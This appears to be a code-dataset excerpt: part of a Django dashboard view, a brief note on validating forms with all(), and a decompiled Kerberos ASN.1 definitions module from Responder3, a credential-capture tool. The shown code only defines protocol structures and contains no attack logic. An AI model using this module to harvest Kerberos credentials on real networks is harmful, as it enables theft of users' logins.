self.creating and form.is_valid():\n self.object.delete()\n self.object = None\n # We currently don't hold on to images if the other formsets didn't\n # validate. 
But as the browser won't re-POST any images, we can do\n # no better than re-bind the image formset, which means the user\n # will have to re-select the images (see #1126)\n image_formset = self.image_formset(instance=self.object)\n\n return self.forms_invalid(\n form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset)\n\n def forms_valid(self, form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset):\n \"\"\"\n Save all changes and display a success url.\n \"\"\"\n if not self.creating:\n # a just created product was already saved in process_all_forms()\n self.object = form.save()\n\n # Save formsets\n category_formset.save()\n fragment_formset.save()\n image_formset.save()\n recommended_formset.save()\n stockrecord_formset.save()\n\n return HttpResponseRedirect(self.get_success_url())\n\n def forms_invalid(self, form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset):\n messages.error(self.request,\n _(\"Your submitted data was not valid - please \"\n \"correct the below errors\"))\n ctx = self.get_context_data(form=form,\n stockrecord_formset=stockrecord_formset,\n category_formset=category_formset,\n fragment_formset=fragment_formset,\n image_formset=image_formset,\n recommended_formset=recommended_formset)\n return self.render_to_response(ctx)\n","sub_path":"practica/apps/dashboard/catalogue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
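A design note on process_all_forms() above: it collects the is_valid() results in a list literal before calling all(). Because the list is built first, every form and formset is validated even when an earlier one fails, so each gets the chance to attach its own errors for the template; a generator or a bare and chain that short-circuited would silently skip the later ones. A tiny standalone sketch of the difference:

# every is_valid() runs because the list is fully built before all() sees it
class FakeForm:
    def __init__(self, ok):
        self.ok = ok
        self.validated = False

    def is_valid(self):
        self.validated = True  # stands in for "error messages were collected"
        return self.ok

forms = [FakeForm(False), FakeForm(True)]
assert all([f.is_valid() for f in forms]) is False
assert all(f.validated for f in forms)   # both ran and collected their errors
# by contrast, all(f.is_valid() for f in forms) would stop after the first failure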
+{"seq_id":"293983683","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\victim\\Desktop\\Responder3\\responder3\\protocols\\KerberosV5.py\n# Compiled at: 2019-04-29 07:33:30\n# Size of source mod 2**32: 29407 bytes\nfrom asn1crypto import core\nimport enum, os\nfrom responder3.core.commons import *\nfrom responder3.core.logging.log_objects import Credential\nfrom responder3.core.asyncio_helpers import *\nTAG = 'explicit'\nUNIVERSAL = 0\nAPPLICATION = 1\nCONTEXT = 2\nkrb5_pvno = 5\n\nclass NAME_TYPE(enum.Enum):\n UNKNOWN = 0\n PRINCIPAL = 1\n SRV_INST = 2\n SRV_HST = 3\n SRV_XHST = 4\n UID = 5\n X500_PRINCIPAL = 6\n SMTP_NAME = 7\n ENTERPRISE_PRINCIPAL = 10\n WELLKNOWN = 11\n ENT_PRINCIPAL_AND_ID = -130\n MS_PRINCIPAL = -128\n MS_PRINCIPAL_AND_ID = -129\n NTLM = -1200\n\n\nclass MESSAGE_TYPE(enum.Enum):\n KRB_AS_REQ = 10\n KRB_AS_REP = 11\n KRB_TGS_REQ = 12\n KRB_TGS_REP = 13\n KRB_AP_REQ = 14\n KRB_AP_REP = 15\n KRB_SAFE = 20\n KRB_PRIV = 21\n KRB_CRED = 22\n KRB_ERROR = 30\n\n\nclass EncryptionType(enum.Enum):\n NULL = 0\n DES_CBC_CRC = 1\n DES_CBC_MD4 = 2\n DES_CBC_MD5 = 3\n DES3_CBC_MD5 = 5\n OLD_DES3_CBC_SHA1 = 7\n SIGN_DSA_GENERATE = 8\n ENCRYPT_RSA_PRIV = 9\n ENCRYPT_RSA_PUB = 10\n DES3_CBC_SHA1 = 16\n AES128_CTS_HMAC_SHA1_96 = 17\n AES256_CTS_HMAC_SHA1_96 = 18\n ARCFOUR_HMAC_MD5 = 23\n ARCFOUR_HMAC_MD5_56 = 24\n ENCTYPE_PK_CROSS = 48\n ARCFOUR_MD4 = -128\n ARCFOUR_HMAC_OLD = -133\n ARCFOUR_HMAC_OLD_EXP = -135\n DES_CBC_NONE = -4096\n DES3_CBC_NONE = -4097\n DES_CFB64_NONE = -4098\n DES_PCBC_NONE = -4099\n DIGEST_MD5_NONE = -4100\n CRAM_MD5_NONE = -4101\n\n\nclass PaDataType(enum.Enum):\n NONE = 0\n TGS_REQ = 1\n AP_REQ = 1\n ENC_TIMESTAMP = 2\n PW_SALT = 3\n ENC_UNIX_TIME = 5\n SANDIA_SECUREID = 6\n SESAME = 7\n OSF_DCE = 8\n CYBERSAFE_SECUREID = 9\n AFS3_SALT = 10\n ETYPE_INFO = 11\n SAM_CHALLENGE = 12\n SAM_RESPONSE = 13\n PK_AS_REQ_19 = 14\n PK_AS_REP_19 = 15\n PK_AS_REQ_WIN = 15\n PK_AS_REQ = 16\n PK_AS_REP = 17\n PA_PK_OCSP_RESPONSE = 18\n ETYPE_INFO2 = 19\n USE_SPECIFIED_KVNO = 20\n SVR_REFERRAL_INFO = 20\n SAM_REDIRECT = 21\n GET_FROM_TYPED_DATA = 22\n SAM_ETYPE_INFO = 23\n SERVER_REFERRAL = 25\n ALT_PRINC = 24\n SAM_CHALLENGE2 = 30\n SAM_RESPONSE2 = 31\n PA_EXTRA_TGT = 41\n TD_KRB_PRINCIPAL = 102\n PK_TD_TRUSTED_CERTIFIERS = 104\n PK_TD_CERTIFICATE_INDEX = 105\n TD_APP_DEFINED_ERROR = 106\n TD_REQ_NONCE = 107\n TD_REQ_SEQ = 108\n PA_PAC_REQUEST = 128\n FOR_USER = 129\n FOR_X509_USER = 130\n FOR_CHECK_DUPS = 131\n AS_CHECKSUM = 132\n PK_AS_09_BINDING = 132\n CLIENT_CANONICALIZED = 133\n FX_COOKIE = 133\n AUTHENTICATION_SET = 134\n AUTH_SET_SELECTED = 135\n FX_FAST = 136\n FX_ERROR = 137\n ENCRYPTED_CHALLENGE = 138\n OTP_CHALLENGE = 141\n OTP_REQUEST = 142\n OTP_CONFIRM = 143\n OTP_PIN_CHANGE = 144\n EPAK_AS_REQ = 145\n EPAK_AS_REP = 146\n PKINIT_KX = 147\n PKU2U_NAME = 148\n REQ_ENC_PA_REP = 149\n SUPPORTED_ETYPES = 165\n\n\nclass PADATA_TYPE(core.Enumerated):\n _map = {0:'NONE', \n 1:'TGS-REQ', \n 1:'AP-REQ', \n 2:'ENC-TIMESTAMP', \n 3:'PW-SALT', \n 5:'ENC-UNIX-TIME', \n 6:'SANDIA-SECUREID', \n 7:'SESAME', \n 8:'OSF-DCE', \n 9:'CYBERSAFE-SECUREID', \n 10:'AFS3-SALT', \n 11:'ETYPE-INFO', \n 12:'SAM-CHALLENGE', \n 13:'SAM-RESPONSE', \n 14:'PK-AS-REQ-19', \n 15:'PK-AS-REP-19', \n 15:'PK-AS-REQ-WIN', \n 16:'PK-AS-REQ', \n 17:'PK-AS-REP', \n 18:'PA-PK-OCSP-RESPONSE', \n 19:'ETYPE-INFO2', \n 20:'USE-SPECIFIED-KVNO', \n 20:'SVR-REFERRAL-INFO', \n 
21:'SAM-REDIRECT', \n 22:'GET-FROM-TYPED-DATA', \n 23:'SAM-ETYPE-INFO', \n 25:'SERVER-REFERRAL', \n 24:'ALT-PRINC', \n 30:'SAM-CHALLENGE2', \n 31:'SAM-RESPONSE2', \n 41:'PA-EXTRA-TGT', \n 102:'TD-KRB-PRINCIPAL', \n 104:'PK-TD-TRUSTED-CERTIFIERS', \n 105:'PK-TD-CERTIFICATE-INDEX', \n 106:'TD-APP-DEFINED-ERROR', \n 107:'TD-REQ-NONCE', \n 108:'TD-REQ-SEQ', \n 128:'PA-PAC-REQUEST', \n 129:'FOR-USER', \n 130:'FOR-X509-USER', \n 131:'FOR-CHECK-DUPS', \n 132:'AS-CHECKSUM', \n 132:'PK-AS-09-BINDING', \n 133:'CLIENT-CANONICALIZED', \n 133:'FX-COOKIE', \n 134:'AUTHENTICATION-SET', \n 135:'AUTH-SET-SELECTED', \n 136:'FX-FAST', \n 137:'FX-ERROR', \n 138:'ENCRYPTED-CHALLENGE', \n 141:'OTP-CHALLENGE', \n 142:'OTP-REQUEST', \n 143:'OTP-CONFIRM', \n 144:'OTP-PIN-CHANGE', \n 145:'EPAK-AS-REQ', \n 146:'EPAK-AS-REP', \n 147:'PKINIT-KX', \n 148:'PKU2U-NAME', \n 149:'REQ-ENC-PA-REP', \n 165:'SUPPORTED-ETYPES'}\n\n\nclass AUTHDATA_TYPE(core.Enumerated):\n _map = {1:'IF-RELEVANT', \n 2:'INTENDED-FOR_SERVER', \n 3:'INTENDED-FOR-APPLICATION-CLASS', \n 4:'KDC-ISSUED', \n 5:'AND-OR', \n 6:'MANDATORY-TICKET-EXTENSIONS', \n 7:'IN-TICKET-EXTENSIONS', \n 8:'MANDATORY-FOR-KDC', \n 9:'INITIAL-VERIFIED-CAS', \n 64:'OSF-DCE', \n 65:'SESAME', \n 66:'OSF-DCE-PKI-CERTID', \n 128:'WIN2K-PAC', \n 129:'GSS-API-ETYPE-NEGOTIATION', \n -17:'SIGNTICKET-OLDER', \n 142:'SIGNTICKET-OLD', \n 512:'SIGNTICKET'}\n\n\nclass CKSUMTYPE(core.Enumerated):\n _map = {0:'NONE', \n 1:'CRC32', \n 2:'RSA_MD4', \n 3:'RSA_MD4_DES', \n 4:'DES_MAC', \n 5:'DES_MAC_K', \n 6:'RSA_MD4_DES_K', \n 7:'RSA_MD5', \n 8:'RSA_MD5_DES', \n 9:'RSA_MD5_DES3', \n 10:'SHA1_OTHER', \n 12:'HMAC_SHA1_DES3', \n 14:'SHA1', \n 15:'HMAC_SHA1_96_AES_128', \n 16:'HMAC_SHA1_96_AES_256', \n 32771:'GSSAPI', \n -138:'HMAC_MD5', \n -1138:'HMAC_MD5_ENC'}\n\n\nclass ENCTYPE(core.Enumerated):\n _map = {0:'NULL', \n 1:'DES_CBC_CRC', \n 2:'DES_CBC_MD4', \n 3:'DES_CBC_MD5', \n 5:'DES3_CBC_MD5', \n 7:'OLD_DES3_CBC_SHA1', \n 8:'SIGN_DSA_GENERATE', \n 9:'ENCRYPT_RSA_PRIV', \n 10:'ENCRYPT_RSA_PUB', \n 16:'DES3_CBC_SHA1', \n 17:'AES128_CTS_HMAC_SHA1_96', \n 18:'AES256_CTS_HMAC_SHA1_96', \n 23:'ARCFOUR_HMAC_MD5', \n 24:'ARCFOUR_HMAC_MD5_56', \n 48:'ENCTYPE_PK_CROSS', \n -128:'ARCFOUR_MD4', \n -133:'ARCFOUR_HMAC_OLD', \n -135:'ARCFOUR_HMAC_OLD_EXP', \n -4096:'DES_CBC_NONE', \n -4097:'DES3_CBC_NONE', \n -4098:'DES_CFB64_NONE', \n -4099:'DES_PCBC_NONE', \n -4100:'DIGEST_MD5_NONE', \n -4101:'CRAM_MD5_NONE'}\n\n\nclass SequenceOfEnctype(core.SequenceOf):\n _child_spec = core.Integer\n\n\nclass Microseconds(core.Integer):\n __doc__ = ' ::= INTEGER (0..999999)\\n\\t-- microseconds\\n '\n\n\nclass krb5int32(core.Integer):\n __doc__ = 'krb5int32 ::= INTEGER (-2147483648..2147483647)\\n '\n\n\nclass krb5uint32(core.Integer):\n __doc__ = 'krb5uint32 ::= INTEGER (0..4294967295)\\n '\n\n\nclass KerberosString(core.GeneralString):\n __doc__ = 'KerberosString ::= GeneralString (IA5String)\\n\\tFor compatibility, implementations MAY choose to accept GeneralString\\n\\tvalues that contain characters other than those permitted by\\n\\tIA5String...\\n\\t'\n\n\nclass SequenceOfKerberosString(core.SequenceOf):\n _child_spec = KerberosString\n\n\nclass Realm(KerberosString):\n __doc__ = 'Realm ::= KerberosString\\n\\t'\n\n\nclass PrincipalName(core.Sequence):\n __doc__ = 'PrincipalName for KDC-REQ-BODY and Ticket\\n\\tPrincipalName ::= SEQUENCE {\\n\\t\\tname-type\\t[0] Int32,\\n\\t\\tname-string [1] SEQUENCE OF KerberosString\\n\\t}\\n\\t'\n _fields = [\n (\n 'name-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 
'name-string', SequenceOfKerberosString, {'tag_type':TAG, 'tag':1})]\n\n\nclass Principal(core.Sequence):\n _fields = [\n (\n 'name', PrincipalName, {'tag_type':TAG, 'tag':0}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':1})]\n\n\nclass Principals(core.SequenceOf):\n _child_spec = Principal\n\n\nclass HostAddress(core.Sequence):\n __doc__ = 'HostAddress for HostAddresses\\n HostAddress ::= SEQUENCE {\\n addr-type [0] Int32,\\n address [1] OCTET STRING\\n }\\n '\n _fields = [\n (\n 'addr-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'address', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass HostAddresses(core.SequenceOf):\n __doc__ = 'SEQUENCE OF HostAddress\\n\\t'\n _child_spec = HostAddress\n\n\nclass KerberosTime(core.GeneralizedTime):\n __doc__ = 'KerberosTime ::= GeneralizedTime\\n '\n\n\nclass AuthorizationDataElement(core.Sequence):\n # core.Sequence (not SequenceOf): this type declares named fields,\n # and asn1crypto only honours _fields on Sequence subclasses\n _fields = [\n (\n 'ad-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'ad-data', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass AuthorizationData(core.SequenceOf):\n __doc__ = 'SEQUENCE OF AuthorizationDataElement\\n\\t'\n _child_spec = AuthorizationDataElement\n\n\nclass APOptions(core.BitString):\n _map = {0:'reserved', \n 1:'use-session-key', \n 2:'mutual-required'}\n\n\nclass TicketFlags(core.BitString):\n _map = {0:'reserved', \n 1:'forwardable', \n 2:'forwarded', \n 3:'proxiable', \n 4:'proxy', \n 5:'may-postdate', \n 6:'postdated', \n 7:'invalid', \n 8:'renewable', \n 9:'initial', \n 10:'pre-authent', \n 11:'hw-authent', \n 12:'transited-policy-checked', \n 13:'ok-as-delegate', \n 14:'anonymous', \n 15:'enc-pa-rep'}\n\n\nclass KDCOptions(core.BitString):\n _map = {0:'reserved', \n 1:'forwardable', \n 2:'forwarded', \n 3:'proxiable', \n 4:'proxy', \n 5:'allow-postdate', \n 6:'postdated', \n 7:'unused7', \n 8:'renewable', \n 9:'unused9', \n 10:'unused10', \n 11:'opt-hardware-auth', \n 12:'unused12', \n 13:'unused13', \n 14:'constrained-delegation', \n 15:'canonicalize', \n 16:'request-anonymous', \n 17:'unused17', \n 18:'unused18', \n 19:'unused19', \n 20:'unused20', \n 21:'unused21', \n 22:'unused22', \n 23:'unused23', \n 24:'unused24', \n 25:'unused25', \n 26:'disable-transited-check', \n 27:'renewable-ok', \n 28:'enc-tkt-in-skey', \n 30:'renew', \n 31:'validate'}\n\n\nclass LR_TYPE(core.Enumerated):\n _map = {0:'NONE', \n 1:'INITIAL_TGT', \n 2:'INITIAL', \n 3:'ISSUE_USE_TGT', \n 4:'RENEWAL', \n 5:'REQUEST', \n 6:'PW_EXPTIME', \n 7:'ACCT_EXPTIME'}\n\n\nclass LastReqInner(core.Sequence):\n _fields = [\n (\n 'lr-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'lr-value', KerberosTime, {'tag_type':TAG, 'tag':1})]\n\n\nclass LastReq(core.SequenceOf):\n _child_spec = LastReqInner\n\n\nclass EncryptedData(core.Sequence):\n _fields = [\n (\n 'etype', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'kvno', krb5uint32, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'cipher', core.OctetString, {'tag_type':TAG, 'tag':2})]\n\n\nclass EncryptionKey(core.Sequence):\n _fields = [\n (\n 'keytype', krb5uint32, {'tag_type':TAG, 'tag':0}),\n (\n 'keyvalue', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass TransitedEncoding(core.Sequence):\n _fields = [\n (\n 'tr-type', krb5uint32, {'tag_type':TAG, 'tag':0}),\n (\n 'contents', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass Ticket(core.Sequence):\n explicit = (\n APPLICATION, 1)\n _fields = [\n (\n 'tkt-vno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':1}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':2}),\n (\n 'enc-part', 
EncryptedData, {'tag_type':TAG, 'tag':3})]\n\n\nclass SequenceOfTicket(core.SequenceOf):\n __doc__ = 'SEQUENCE OF Ticket for KDC-REQ-BODY\\n\\t'\n _child_spec = Ticket\n\n\nclass EncTicketPart(core.Sequence):\n explicit = (\n APPLICATION, 3)\n _fields = [\n (\n 'flags', TicketFlags, {'tag_type':TAG, 'tag':0}),\n (\n 'key', EncryptionKey, {'tag_type':TAG, 'tag':1}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':2}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':3}),\n (\n 'transited', TransitedEncoding, {'tag_type':TAG, 'tag':4}),\n (\n 'authtime', KerberosTime, {'tag_type':TAG, 'tag':5}),\n (\n 'starttime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'endtime', KerberosTime, {'tag_type':TAG, 'tag':7}),\n (\n 'renew-till', KerberosTime, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'caddr', HostAddresses, {'tag_type':TAG, 'tag':9, 'optional':True}),\n (\n 'authorization-data', AuthorizationData, {'tag_type':TAG, 'tag':10, 'optional':True})]\n\n\nclass Checksum(core.Sequence):\n _fields = [\n (\n 'cksumtype', CKSUMTYPE, {'tag_type':TAG, 'tag':0}),\n (\n 'checksum', core.OctetString, {'tag_type':TAG, 'tag':1})]\n\n\nclass Authenticator(core.Sequence):\n explicit = (\n APPLICATION, 2)\n _fields = [\n (\n 'authenticator-vno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':1}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':2}),\n (\n 'cksum', Checksum, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'cusec', krb5int32, {'tag_type':TAG, 'tag':4}),\n (\n 'ctime', KerberosTime, {'tag_type':TAG, 'tag':5}),\n (\n 'subkey', EncryptionKey, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':7, 'optional':True}),\n (\n 'authorization-data', AuthorizationData, {'tag_type':TAG, 'tag':8, 'optional':True})]\n\n\nclass PA_DATA(core.Sequence):\n _fields = [\n (\n 'padata-type', core.Integer, {'tag_type':TAG, 'tag':1}),\n (\n 'padata-value', core.OctetString, {'tag_type':TAG, 'tag':2})]\n\n\nclass ETYPE_INFO_ENTRY(core.Sequence):\n _fields = [\n (\n 'etype', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'salt', core.OctetString, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'salttype', krb5int32, {'tag_type':TAG, 'tag':2, 'optional':True})]\n\n\nclass ETYPE_INFO(core.SequenceOf):\n _child_spec = ETYPE_INFO_ENTRY\n\n\nclass ETYPE_INFO2_ENTRY(core.Sequence):\n _fields = [\n (\n 'etype', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'salt', KerberosString, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 's2kparams', core.OctetString, {'tag_type':TAG, 'tag':2, 'optional':True})]\n\n\nclass ETYPE_INFO2(core.SequenceOf):\n _child_spec = ETYPE_INFO2_ENTRY\n\n\nclass METHOD_DATA(core.SequenceOf):\n _child_spec = PA_DATA\n\n\nclass TypedData(core.Sequence):\n _fields = [\n (\n 'data-type', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'data-value', core.OctetString, {'tag_type':TAG, 'tag':1, 'optional':True})]\n\n\nclass KDC_REQ_BODY(core.Sequence):\n _fields = [\n (\n 'kdc-options', KDCOptions, {'tag_type':TAG, 'tag':0}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':2}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'from', KerberosTime, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'till', KerberosTime, {'tag_type':TAG, 'tag':5, 'optional':True}),\n (\n 'rtime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'nonce', krb5int32, {'tag_type':TAG, 
'tag':7}),\n (\n 'etype', SequenceOfEnctype, {'tag_type':TAG, 'tag':8}),\n (\n 'addresses', HostAddresses, {'tag_type':TAG, 'tag':9, 'optional':True}),\n (\n 'enc-authorization-data', EncryptedData, {'tag_type':TAG, 'tag':10, 'optional':True}),\n (\n 'additional-tickets', SequenceOfTicket, {'tag_type':TAG, 'tag':11, 'optional':True})]\n\n\nclass KDC_REQ(core.Sequence):\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':2}),\n (\n 'padata', METHOD_DATA, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'req-body', KDC_REQ_BODY, {'tag_type':TAG, 'tag':4})]\n\n\nclass AS_REQ(KDC_REQ):\n explicit = (\n APPLICATION, 10)\n\n\nclass TGS_REQ(KDC_REQ):\n explicit = (\n APPLICATION, 12)\n\n\nclass PA_ENC_TS_ENC(core.Sequence):\n _fields = [\n (\n 'patimestamp', KerberosTime, {'tag_type':TAG, 'tag':0}),\n (\n 'pausec', krb5int32, {'tag_type':TAG, 'tag':1, 'optional':True})]\n\n\nclass PA_PAC_REQUEST(core.Sequence):\n _fields = [\n (\n 'include-pac', core.Boolean, {'tag_type':TAG, 'tag':0})]\n\n\nclass PROV_SRV_LOCATION(core.GeneralString):\n pass\n\n\nclass KDC_REP(core.Sequence):\n _fields = [\n (\n 'pvno', core.Integer, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'padata', METHOD_DATA, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':3}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':4}),\n (\n 'ticket', Ticket, {'tag_type':TAG, 'tag':5}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':6})]\n\n\nclass AS_REP(KDC_REP):\n explicit = (\n APPLICATION, 11)\n\n\nclass TGS_REP(KDC_REP):\n explicit = (\n APPLICATION, 13)\n\n\nclass EncKDCRepPart(core.Sequence):\n _fields = [\n (\n 'key', EncryptionKey, {'tag_type':TAG, 'tag':0}),\n (\n 'last-req', LastReq, {'tag_type':TAG, 'tag':1}),\n (\n 'nonce', krb5int32, {'tag_type':TAG, 'tag':2}),\n (\n 'key-expiration', KerberosTime, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'flags', TicketFlags, {'tag_type':TAG, 'tag':4}),\n (\n 'authtime', KerberosTime, {'tag_type':TAG, 'tag':5}),\n (\n 'starttime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'endtime', KerberosTime, {'tag_type':TAG, 'tag':7}),\n (\n 'renew-till', KerberosTime, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'srealm', Realm, {'tag_type':TAG, 'tag':9}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':10}),\n (\n 'caddr', HostAddresses, {'tag_type':TAG, 'tag':11, 'optional':True}),\n (\n 'encrypted-pa-data', METHOD_DATA, {'tag_type':TAG, 'tag':12, 'optional':True})]\n\n\nclass EncASRepPart(EncKDCRepPart):\n explicit = (\n APPLICATION, 25)\n\n\nclass EncTGSRepPart(EncKDCRepPart):\n explicit = (\n APPLICATION, 26)\n\n\nclass AP_REQ(core.Sequence):\n explicit = (\n APPLICATION, 14)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'ap-options', APOptions, {'tag_type':TAG, 'tag':2}),\n (\n 'ticket', Ticket, {'tag_type':TAG, 'tag':3}),\n (\n 'authenticator', EncryptedData, {'tag_type':TAG, 'tag':4})]\n\n\nclass AP_REP(core.Sequence):\n explicit = (\n APPLICATION, 15)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':2})]\n\n\nclass EncAPRepPart(core.Sequence):\n explicit = (\n APPLICATION, 27)\n _fields = [\n (\n 'ctime', KerberosTime, {'tag_type':TAG, 'tag':0}),\n (\n 'cusec', krb5int32, 
{'tag_type':TAG, 'tag':1}),\n (\n 'subkey', EncryptionKey, {'tag_type':TAG, 'tag':2}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':3, 'optional':True})]\n\n\nclass KRB_SAFE_BODY(core.Sequence):\n _fields = [\n (\n 'user-data', core.OctetString, {'tag_type':TAG, 'tag':0}),\n (\n 'timestamp', KerberosTime, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'usec', krb5int32, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 's-address', HostAddress, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'r-address', HostAddress, {'tag_type':TAG, 'tag':5, 'optional':True})]\n\n\nclass KRB_SAFE(core.Sequence):\n explicit = (\n APPLICATION, 20)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'safe-body', KRB_SAFE_BODY, {'tag_type':TAG, 'tag':2}),\n (\n 'cksum', Checksum, {'tag_type':TAG, 'tag':3})]\n\n\nclass KRB_PRIV(core.Sequence):\n explicit = (\n APPLICATION, 21)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':2})]\n\n\nclass EncKrbPrivPart(core.Sequence):\n explicit = (\n APPLICATION, 28)\n _fields = [\n (\n 'user-data', core.OctetString, {'tag_type':TAG, 'tag':0}),\n (\n 'timestamp', KerberosTime, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'usec', krb5int32, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 's-address', HostAddress, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'r-address', HostAddress, {'tag_type':TAG, 'tag':5, 'optional':True})]\n\n\nclass KRB_CRED(core.Sequence):\n explicit = (\n APPLICATION, 22)\n _fields = [\n (\n 'pvno', core.Integer, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', core.Integer, {'tag_type':TAG, 'tag':1}),\n (\n 'tickets', SequenceOfTicket, {'tag_type':TAG, 'tag':2}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':3})]\n\n\nclass KrbCredInfo(core.Sequence):\n _fields = [\n (\n 'key', EncryptionKey, {'tag_type':TAG, 'tag':0}),\n (\n 'prealm', Realm, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'pname', PrincipalName, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'flags', TicketFlags, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'authtime', KerberosTime, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'starttime', KerberosTime, {'tag_type':TAG, 'tag':5, 'optional':True}),\n (\n 'endtime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'renew-till', KerberosTime, {'tag_type':TAG, 'tag':7, 'optional':True}),\n (\n 'srealm', Realm, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':9, 'optional':True}),\n (\n 'caddr', HostAddresses, {'tag_type':TAG, 'tag':10, 'optional':True})]\n\n\nclass SequenceOfKrbCredInfo(core.SequenceOf):\n _child_spec = KrbCredInfo\n\n\nclass EncKrbCredPart(core.Sequence):\n explicit = (\n APPLICATION, 29)\n _fields = [\n (\n 'ticket-info', SequenceOfKrbCredInfo, {'tag_type':TAG, 'tag':0}),\n (\n 'nonce', krb5int32, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'timestamp', KerberosTime, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'usec', krb5int32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 's-address', HostAddress, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'r-address', HostAddress, {'tag_type':TAG, 'tag':5, 
